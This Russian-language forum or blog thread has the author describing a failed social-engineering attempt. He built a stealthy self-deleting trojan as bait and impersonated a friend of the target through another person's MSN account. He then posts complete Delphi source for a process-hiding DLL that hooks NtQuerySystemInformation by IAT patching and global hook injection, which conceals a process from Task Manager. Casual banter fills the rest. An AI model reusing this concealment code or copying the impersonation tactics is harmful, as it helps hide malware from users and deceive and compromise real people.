Лисса! Это ужасное слово Лисса :D Да, и именно с двумя "с" )) Она же Леди_электричество )
Я целых полмесяца готовился для обмана Леди-Электричества... Но не тут то было ! Полмесяца я оттачивал троянчик написаный специально для этого эксперимента, специально для неё и для всей этой предуманой истории-легенды! И ведь отличный трой получился, в системе не видим, работает шустро, после чего самоудаляется не оставляя следов, чтобы, даже при подозрениях уже не попал в антивирусные базы. Он не заражает комп. Такой однаразовый. И брандмаэр бы не стал для него проблемой. Эх... Жаль, до него даже не дошло ))) Задача была впарить инфицированую приманку. чОрт чОрт чОрт )) При всех экспериментах, когда человек неожидал, всегда всё проходило как по маслу. Она же ожидала[в этом и была проблема данного эксперимента], может быть это ей помогло... Но вообщем она меня раскусила прямо на первом этапе социальной инженерии, когда я должен был убедить, что это не я вовсе, а подруга Галюцинации. Вот так всё было закручено )) Но видимо я промохнулся в мелочах, точнее в совокупности мелочей. Мне надо было заранее убрать стандартные настройки МСНа и установить аватар, точно такой же шрифт в МСНе и изучить заранее как эта девушка должна была разговаривать, её стиль, наверно это меня и подвело. Хотя с технической стороны дела, я вроде сделал всё безупречно, если бы стали подробненько узнавать откуда пришло письмо со скрином ситуации и другое, то ничего подозрительного бы не обнаружили. Да и мелочи многие я тоже продумал, такие как намекнул Глю, что я якобы спрашиваю номер ICQ её подруги, что бы позже она предположила, что я болтал с подругой по аське. И чтобы Глю стала подтверждать Лиссе, что я и есть её настоящая подруга... Впринципе так оно и вышло... Ндя.. наверно я поторопился... да я очень торопился... меня мог провайдер уже выкинуть в любое время, так как время поджимало.
Было два момента когда я понял, что это провал )))
Первый, это когда Лисса наотрез отказалась принимать приманку. А воторой когда она мне напрямую сказала: "Вес, хватит прикалываться ))" 
Вообщем, впервые такой провал и это не плохо ! Совсем не плохо. Так как дало важный урок, и эта история наверно войдёт в статью про Соц.инженерию, которая появится на Ноиле.
P.S. Лисса, молодец зайчон ;) Ладно... так и быть не буду я тебя больше мучать наверное. :D Этого для статьи хватит, буду эксперименты теперь с другими ставить )))
Нат, ну так что было моим главным проколом ? Меня тогда утром всё таки провайдер отключил, так как было уже 8.00...
А вообще, Нат, согласись, что всё таки ближе к концу ты повеила, что это не WEC, так ведь ? ) Признайся )) Это было видно ))
P.P.S. Латерне, надеюсь ты не испугалась )) Прости пожалуйста что немного попользовался твоим МСНом. Вообщем, я ничего не испортил, можешь проверить ) Сделала, ради обмана Лиссы) смени пароли в почте, в МСНе. Ставь пароли посложнее. Спасиб, без тебя бы вообще это не вышло. Тоже тебя зачиком назову и поцелую: 
вот ))
P.P.P.S. Глю, могла бы с подругой(тоесть со мной :D ) то поговорить, ты бы как моим подтверждением стала )) Или ты тоже заподозрила ? ) И вообще что происходило, когда я пришёл под чужим именем ? ) Расскажите, интересно же ) Мне нужно узнать как вы подозревали, почему, и если подозревали, как хотели меня проверять? Мне это нужно для статьи, так что выкладывайте плиз )
Исходное сообщение Chgou вот так-то... нужно знакомиЦЦа с личными зар-ками людей!!)))с какими "зар-ками" ? Что это значит ? )) Непонял )) Кивашка, С Делфи знаком ? Трой как трой, я лучше тебе другое покажу, может ты не видел ещё такое ;)
:
library NThide; uses Windows, SysUtils, ImageHlp, TlHelp32; type SYSTEM_INFORMATION_CLASS = ( SystemBasicInformation, SystemProcessorInformation, SystemPerformanceInformation, SystemTimeOfDayInformation, SystemNotImplemented1, SystemProcessesAndThreadsInformation, SystemCallCounts, SystemConfigurationInformation, SystemProcessorTimes, SystemGlobalFlag, SystemNotImplemented2, SystemModuleInformation, SystemLockInformation, SystemNotImplemented3, SystemNotImplemented4, SystemNotImplemented5, SystemHandleInformation, SystemObjectInformation, SystemPagefileInformation, SystemInstructionEmulationCounts, SystemInvalidInfoClass1, SystemCacheInformation, SystemPoolTagInformation, SystemProcessorStatistics, SystemDpcInformation, SystemNotImplemented6, SystemLoadImage, SystemUnloadImage, SystemTimeAdjustment, SystemNotImplemented7, SystemNotImplemented8, SystemNotImplemented9, SystemCrashDumpInformation, SystemExceptionInformation, SystemCrashDumpStateInformation, SystemKernelDebuggerInformation, SystemContextSwitchInformation, SystemRegistryQuotaInformation, SystemLoadAndCallImage, SystemPrioritySeparation, SystemNotImplemented10, SystemNotImplemented11, SystemInvalidInfoClass2, SystemInvalidInfoClass3, SystemTimeZoneInformation, SystemLookasideInformation, SystemSetTimeSlipEvent, SystemCreateSession, SystemDeleteSession, SystemInvalidInfoClass4, SystemRangeStartInformation, SystemVerifierInformation, SystemAddVerifier, SystemSessionProcessesInformation ); _IMAGE_IMPORT_DESCRIPTOR = packed record case Integer of 0: ( Characteristics: DWORD); 1: ( OriginalFirstThunk: DWORD; TimeDateStamp: DWORD; ForwarderChain: DWORD; Name: DWORD; FirstThunk: DWORD); end; IMAGE_IMPORT_DESCRIPTOR=_IMAGE_IMPORT_DESCRIPTOR; PIMAGE_IMPORT_DESCRIPTOR=^IMAGE_IMPORT_DESCRIPTOR; PFARPROC=^FARPROC; (*Нижеследующая процедура взята из Рихтера и переделана на Delphi*) procedure ReplaceIATEntryInOneMod(pszCallerModName:Pchar;pfnCurrent:FarProc;pfnNew:FARPROC;hmodCaller:hModule); var ulSize:ULONG; pImportDesc:PIMAGE_IMPORT_DESCRIPTOR;pszModName:PChar; pThunk:PDWORD; ppfn:PFARPROC;ffound:LongBool;written: DWORD; begin pImportDesc := ImageDirectoryEntryToData(Pointer(hmodCaller), TRUE,IMAGE_DIRECTORY_ENTRY_IMPORT, ulSize); if pImportDesc = nil then exit; while pImportDesc.Name<>0 do begin pszModName := PChar(hmodCaller + pImportDesc.Name); if (lstrcmpiA(pszModName, pszCallerModName) = 0) then break; Inc(pImportDesc); end; if (pImportDesc.Name = 0) then exit; pThunk := PDWORD(hmodCaller + pImportDesc.FirstThunk); while pThunk^<>0 do begin ppfn := PFARPROC(pThunk); fFound := (ppfn^ = pfnCurrent); if (fFound) then begin VirtualProtectEx(GetCurrentProcess,ppfn,4,PAGE_EXECUTE_READWRITE,written); WriteProcessMemory(GetCurrentProcess, ppfn, @pfnNew, sizeof(pfnNew), Written); exit; end; Inc(pThunk); end; end; var addr_NtQuerySystemInformation:Pointer; mypid: DWORD; fname:PCHAR; mapaddr:PDWORD; hideOnlyTaskMan:PBOOL; (*А это взято из материалов сайта Wasm.ru*) function myNtQuerySystemInfo(SystemInformationClass:SYSTEM_INFORMATION_CLASS;SystemInformation:Pointer; SystemInformationLength:ULONG;ReturnLength:PULONG):LongInt;stdcall; label onceagain,getnextpidstruct,quit,fillzero; asm push ReturnLength push SystemInformationLength push SystemInformation push dword ptr SystemInformationClass call dword ptr [addr_NtQuerySystemInformation] or eax,eax jl quit cmp SystemInformationClass,SystemProcessesAndThreadsInformation jne quit onceagain: mov esi,SystemInformation getnextpidstruct: mov ebx,esi cmp dword ptr [esi],0 je quit add esi,[esi] mov ecx,[esi+44h] cmp ecx,mypid jne getnextpidstruct mov edx,[esi] test edx,edx je fillzero add [ebx],edx jmp onceagain fillzero: and [ebx],edx jmp onceagain quit: mov Result,eax end; procedure InterceptFunctions; var hSnapShot:THandle;me32:MODULEENTRY32; begin addr_NtQuerySystemInformation:=GetProcAddress(getModuleHandle('ntdll.dll'),'NtQuerySystemInformation'); hSnapShot:=CreateToolHelp32SnapShot(TH32CS_SNAPMODULE,GetCurrentProcessId); if hSnapshot=INVALID_HANDLE_VALUE then exit; try ZeroMemory(@me32,sizeof(MODULEENTRY32)); me32.dwSize:=sizeof(MODULEENTRY32); Module32First(hSnapShot,me32); repeat ReplaceIATEntryInOneMod('ntdll.dll',addr_NtQuerySystemInformation,@MyNtQuerySystemInfo,me32.hModule); until not Module32Next(hSnapShot,me32); finally CloseHandle(hSnapShot); end; end; procedure UninterceptFunctions; var hSnapShot:THandle;me32:MODULEENTRY32; begin addr_NtQuerySystemInformation:=GetProcAddress(getModuleHandle('ntdll.dll'),'NtQuerySystemInformation'); hSnapShot:=CreateToolHelp32SnapShot(TH32CS_SNAPMODULE,GetCurrentProcessId); if hSnapshot=INVALID_HANDLE_VALUE then exit; try ZeroMemory(@me32,sizeof(MODULEENTRY32)); me32.dwSize:=sizeof(MODULEENTRY32); Module32First(hSnapShot,me32); repeat ReplaceIATEntryInOneMod('ntdll.dll',@MyNtQuerySystemInfo,addr_NtQuerySystemInformation,me32.hModule); until not Module32Next(hSnapShot,me32); finally CloseHandle(hSnapShot); end; end; var HookHandle: THandle; function CbtProc(code: integer; wparam: integer; lparam: integer):Integer; stdcall; begin Result:=0; end; procedure InstallHook; stdcall; begin HookHandle:=SetWindowsHookEx(WH_CBT, @CbtProc, HInstance, 0); end; var hFirstMapHandle:THandle; function HideProcess(pid: DWORD; HideOnlyFromTaskManager:BOOL(*Прятать только от TaskManager или еще и от других прог?*)):BOOL;stdcall; var addrMap:PDWORD;ptr2:PBOOL; begin mypid:=0; result:=false; hFirstMapHandle:=CreateFileMapping($FFFFFFFF,nil,PAGE_READWRITE,0,8,'NtHideFileMapping'); if hFirstMapHandle=0 then exit; addrMap:=MapViewOfFile(hFirstMapHandle,FILE_MAP_WRITE,0,0,8); if addrMap=nil then begin CloseHandle(hFirstMapHandle); exit; end; addrMap^:=pid; ptr2:=PBOOL(DWORD(addrMap)+4); ptr2^:=HideOnlyFromTaskManager; UnmapViewOfFile(addrMap);//унмапим, но хендл для Mapping'а не закрываем, чтобы он не уничтожился InstallHook; //хук result:=true; end; exports HideProcess; var hmap:THandle; procedure LibraryProc(Reason: Integer); begin if Reason=DLL_PROCESS_DETACH then if mypid>0 then UninterceptFunctions() else CloseHandle(hFirstMapHandle); end; begin hmap:=OpenFileMapping(FILE_MAP_READ,false,'NtHideFileMapping'); if hmap=0 then exit; try mapaddr:=MapViewOfFile(hmap,FILE_MAP_READ,0,0,0); if mapaddr=nil then exit; mypid:=mapaddr^; hideOnlyTaskMan:=PBOOL(DWORD(mapaddr)+4); if hideOnlyTaskMan^ then begin fname:=allocMem(MAX_PATH+1); GetModuleFileName(GetModuleHandle(nil),fname,MAX_PATH+1); if not (ExtractFileName(fname)='taskmgr.exe') then exit; end; InterceptFunctions; finally UnmapViewOfFile(mapaddr); CloseHandle(Hmap); DLLProc:=@LibraryProc; end; end.
Исходное сообщение Кивашка: Передавай там приветы девчонкам)) А то я их не вижу че то(Так они тут бывают вроде иногда, тут и передай сам ;)
Исходное сообщение WEC1: [QUOTE]Исходное сообщение Chgou с какими "зар-ками" ? Что это значит ? )) Непонял ))пардон... хотела сократить слово и не ту букАвку поставила... ну, с личными тарканами человека, которого собираешься "копировать"!!)) В колонках играет: Сценакардия - Делу время (Кардебалет)
Исходное сообщение Chgou: пардон... хотела сократить слово и не ту букАвку поставила... ну, с личными тарканами человека, которого собираешься "копировать"!!))Так-с )) Начнём )) Chgou, расскажите пожалуйста о Ваших тараканах :D Мне это нужно для одного дельца ;)
Исходное сообщение WEC1: Так-с )) Начнём )) Chgou, расскажите пожалуйста о Ваших тараканах :D Мне это нужно для одного дельца ;)для Вас - кЫсь!!)) ну, у меня их всего три!! Рыжий, длинный и Серый!!)) Рыжий - русский!! длинный - американский, а Серый - на самом деле француз... и зовут его Сержо!! такой вот интернационал!!))) ещё мышка есть!! Точней не мышь, а что-то типа гибрида вышеупомянутой и и хомяка... "Тапо" зовут!!)))))) В колонках играет: Дима Билан - Одинокая Гармонь
Исходное сообщение Chgou: ну, у меня их всего три!! Рыжий, длинный и Серый!!)) Рыжий - русский!! длинный - американский, а Серый - на самом деле француз... и зовут его Сержо!! такой вот интернационал!!))) ещё мышка есть!! Точней не мышь, а что-то типа гибрида вышеупомянутой и и хомяка... "Тапо" зовут!!))))))Прям зоопарк какой-то :D Надеюсь, Вы их кормите ? )))
Исходное сообщение WEC1: Прям зоопарк какой-то :D Надеюсь, Вы их кормите ? )))ytnнет!! муж поесть оставляет!!)) Он и меня кормит!!))) В колонках играет: Daje esli ti uydesh SERGEY LAZAREV
Кивашка,
Привет))
Исходное сообщение glu: [B Chgou, кЫся жжжошьугу!!))) В колонках играет: Daje esli ti uydesh SERGEY LAZAREV
Исходное сообщение glu: Chgou, *засосало*а тя на смайлы сёня прёт!!))) засосало меня!?!? куда!?!?! В колонках играет: Christina Aguilera - Fighter (Album Version)[показать]
Исходное сообщение Chgou: а тя на смайлы сёня прёт!!))) засосало меня!?!? куда!?!?!Не то слово !!! ))) Весь МСН уже заспамила смайлами )))00 такая зайчон
Исходное сообщение glu: Chgou, Ага ..прикольные смайлики :D Ну куда я тя могу засосать?) Ну как обычнаВай-вай... засасывай поскорей!! В колонках играет: Lindsay Lohan - Nobody 'Til You
Исходное сообщение WEC1: Не то слово !!! ))) Весь МСН уже заспамила смайлами )))00 такая зайчонэто не зайчон, а покемон!! В колонках играет: Lindsay Lohan - Nobody 'Til You
Исходное сообщение glu: Chgou, *уже засосало уже высасываю вместе с ребрами))))*а не надо меня высасывать!!)) В колонках играет: Plazma - An Ordinaly Miracle!!
Исходное сообщение Леди_Элекричество это.. Здрасти Вам) Вообщем на счет "поверила в конце". На самом деле в конце я окончательно убедилась что это ты) Думаешь я зря тебе говорила "Спроси у Веса. он мальчик умный, обязательно что-нибудь придумает" =)Ну и ладно
[показать]